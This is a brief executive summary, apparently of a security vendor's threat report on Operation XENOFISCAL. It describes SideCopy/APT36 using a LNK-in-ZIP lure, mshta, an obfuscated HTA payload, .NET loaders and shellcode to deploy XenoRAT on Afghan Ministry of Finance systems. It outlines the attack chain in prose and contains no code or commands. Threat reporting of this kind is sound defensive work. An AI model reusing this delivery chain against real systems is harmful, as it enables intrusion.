Operation XENOFISCAL: SideCopy deploying persistent XenoRAT targeting the MoF, Afghanistan

## Executive summary Seqrite Labs documents a targeted spear-phishing campaign (Operation XENOFISCAL) attributed to the SideCopy/APT36 cluster that used a Pashto-labeled LNK inside a ZIP to invoke mshta and fetch an obfuscated HTA/JavaScript payload, staged multiple .NET loader DLLs and in-memory shellcode, and ultimately deployed XenoRAT to provincial Ministry of Finance systems in Afghanistan; the report includes full technical analysis, IOCs (hashes, domains, IPs), infrastructure attribution, and MITRE ATT&CK mappings.